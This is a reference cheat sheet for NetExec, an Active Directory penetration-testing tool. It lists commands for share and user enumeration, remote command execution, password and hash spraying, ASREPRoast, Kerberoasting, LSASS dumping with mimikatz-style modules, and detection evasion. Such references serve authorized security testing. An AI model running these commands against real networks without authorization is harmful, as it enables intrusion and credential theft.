
NetExec

NetExec (formerly CrackMapExec) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks through network protocol abuse and credential attacks.

Installation & Setup

Command | Description
pip3 install netexec | Install NetExec via pip
pipx install netexec | Install with pipx (recommended)
git clone https://github.com/Pennyw0rth/NetExec.git | Clone from GitHub
cd NetExec && pip3 install . | Install from source
netexec --version | Check installed version
netexec --help | Display help information

Basic Usage

Command | Description
netexec smb 192.168.1.0/24 | Scan SMB on subnet
netexec smb 192.168.1.100 -u username -p password | Authenticate with credentials
netexec smb 192.168.1.100 -u username -H ntlmhash | Authenticate with NTLM hash
netexec smb 192.168.1.100 -u '' -p '' | Anonymous authentication
netexec smb targets.txt -u username -p password | Use target file

Protocol Support

SMB Protocol

Command | Description
netexec smb 192.168.1.100 | Basic SMB enumeration
netexec smb 192.168.1.100 --shares | Enumerate shares
netexec smb 192.168.1.100 --users | Enumerate users
netexec smb 192.168.1.100 --groups | Enumerate groups
netexec smb 192.168.1.100 --local-groups | Enumerate local groups
netexec smb 192.168.1.100 --sessions | Enumerate sessions
netexec smb 192.168.1.100 --disks | Enumerate disks

WinRM Protocol

Command | Description
netexec winrm 192.168.1.100 -u username -p password | WinRM authentication
netexec winrm 192.168.1.100 -u username -p password -x "whoami" | Execute command
netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1 | Execute PowerShell script

LDAP Protocol

Command | Description
netexec ldap 192.168.1.100 -u username -p password | LDAP authentication
netexec ldap 192.168.1.100 -u username -p password --users | Enumerate LDAP users
netexec ldap 192.168.1.100 -u username -p password --groups | Enumerate LDAP groups
netexec ldap 192.168.1.100 -u username -p password --computers | Enumerate computers

MSSQL Protocol

Command | Description
netexec mssql 192.168.1.100 -u username -p password | MSSQL authentication
netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version" | Execute SQL query
netexec mssql 192.168.1.100 -u username -p password --local-auth | Local authentication

SSH Protocol

Command | Description
netexec ssh 192.168.1.100 -u username -p password | SSH authentication
netexec ssh 192.168.1.100 -u username --key-file id_rsa | SSH key authentication (the ssh protocol takes the key with --key-file; -k is the Kerberos flag)
netexec ssh 192.168.1.100 -u username -p password -x "id" | Execute command

Authentication Methods

Password Authentication

Command | Description
netexec smb 192.168.1.100 -u username -p password | Single credential
netexec smb 192.168.1.100 -u users.txt -p passwords.txt | Credential lists
netexec smb 192.168.1.100 -u username -p passwords.txt | Password spraying
netexec smb 192.168.1.100 -u users.txt -p password | User enumeration

Hash Authentication

Command | Description
netexec smb 192.168.1.100 -u username -H ntlmhash | NTLM hash
netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash | LM:NTLM hash
netexec smb 192.168.1.100 -u users.txt -H hashes.txt | Hash lists

Kerberos Authentication

Command | Description
netexec smb 192.168.1.100 -u username -p password -k | Kerberos authentication
netexec smb 192.168.1.100 -u username --use-kcache | Use Kerberos cache
netexec smb 192.168.1.100 -u username -p password --kerberos | Force Kerberos

Enumeration

Share Enumeration

Command | Description
netexec smb 192.168.1.100 --shares | List shares
netexec smb 192.168.1.100 --shares -u username -p password | Authenticated share listing
netexec smb 192.168.1.100 --spider SHARE | Spider share contents
netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt" | Search for files

User Enumeration

Command | Description
netexec smb 192.168.1.100 --users | Enumerate users
netexec smb 192.168.1.100 --rid-brute | RID bruteforce
netexec smb 192.168.1.100 --rid-brute 2000 | RID bruteforce up to a maximum RID (--rid-brute takes a single upper bound, not a range)

Group Enumeration

Command | Description
netexec smb 192.168.1.100 --groups | Enumerate groups
netexec smb 192.168.1.100 --local-groups | Local groups
netexec smb 192.168.1.100 --groups "Domain Admins" | Specific group

Computer Enumeration

Command | Description
netexec ldap 192.168.1.100 --computers | Enumerate computers
netexec smb 192.168.1.100 --computers | SMB computer enumeration

Command Execution

SMB Command Execution

Command | Description
netexec smb 192.168.1.100 -u username -p password -x "whoami" | Execute command
netexec smb 192.168.1.100 -u username -p password -X script.ps1 | Execute PowerShell script
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec | Use WMI execution
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec | Use SMB execution

WinRM Command Execution

Command | Description
netexec winrm 192.168.1.100 -u username -p password -x "Get-Process" | PowerShell command
netexec winrm 192.168.1.100 -u username -p password -X script.ps1 | Execute script

Modules

Built-in Modules

Command | Description
netexec smb 192.168.1.100 -M spider_plus | Enhanced spidering
netexec smb 192.168.1.100 -M enum_avproducts | Enumerate AV products
netexec smb 192.168.1.100 -M gpp_password | Group Policy Preferences
netexec smb 192.168.1.100 -M lsassy | LSASS dumping
netexec smb 192.168.1.100 -M mimikatz | Mimikatz execution

Module Options

Command | Description
netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false | Module options
netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true | Bloodhound output

Database Operations

Command | Description
netexec smb 192.168.1.100 --users --export users.csv | Export to CSV
netexec db | Database management
netexec db --workspace default | Set workspace
netexec db --clear-database | Clear database

Advanced Features

Credential Stuffing

Command | Description
netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success | Continue on success
netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3 | Fail limit

Password Policy

Command | Description
netexec smb 192.168.1.100 --pass-pol | Get password policy
netexec ldap 192.168.1.100 --pass-pol | LDAP password policy

Bloodhound Integration

Command | Description
netexec ldap 192.168.1.100 -u username -p password --bloodhound | Collect Bloodhound data
netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All | All collections

ASREPRoast

Command | Description
netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt | ASREPRoast attack
netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt | Authenticated ASREPRoast

Kerberoasting

Command | Description
netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt | Kerberoasting attack

Output and Logging

Command | Description
netexec smb 192.168.1.100 --verbose | Verbose output
netexec smb 192.168.1.100 --debug | Debug output
netexec smb 192.168.1.100 --log nxc_output.log | Save output to a log file (--log takes a file path; -o is reserved for module options)

Configuration

Config File (~/.nxc/nxc.conf)

[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0

Protocol-specific Options

Command | Description
netexec smb 192.168.1.100 --port 445 | Custom port
netexec smb 192.168.1.100 --timeout 5 | Connection timeout
netexec smb 192.168.1.100 --threads 100 | Thread count

Evasion Techniques

Command | Description
netexec smb 192.168.1.100 --jitter 1-5 | Random delay
netexec smb 192.168.1.100 --delay 2 | Fixed delay
netexec smb 192.168.1.100 --obfs | Obfuscation

Common Attack Scenarios

Domain Enumeration

# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers

# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares

# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol

Credential Attacks

# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt

Post-Exploitation

# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"

# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy

# Bloodhound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All

Integration with Other Tools

Impacket Integration

Command | Description
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec | Use Impacket WMI
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec | Use Impacket SMB

Crackmapexec Migration

Command | Description
netexec --convert-cme-db | Convert CME database
alias cme='netexec' | Create alias for compatibility

Troubleshooting

Command | Description
netexec --help | General help
netexec smb --help | Protocol-specific help
netexec --version | Version information
netexec --debug smb 192.168.1.100 | Debug mode

Best Practices

  • Use authentication before enumeration when possible
  • Implement proper delays to avoid detection
  • Use workspaces to organize different engagements
  • Export results for further analysis
  • Combine with other tools for comprehensive assessment
  • Monitor for defensive responses
  • Use appropriate thread counts to avoid overwhelming targets
  • Implement proper logging for documentation
  • Validate credentials before large-scale attacks
  • Use obfuscation techniques when necessary

Security Considerations

  • Only use on authorized networks
  • Implement proper access controls
  • Monitor for detection by security tools
  • Use least privilege principles
  • Document all activities for compliance
  • Coordinate with blue team when applicable
  • Implement proper cleanup procedures
  • Store credentials securely
  • Use encrypted communication when possible
  • Update regularly to maintain effectiveness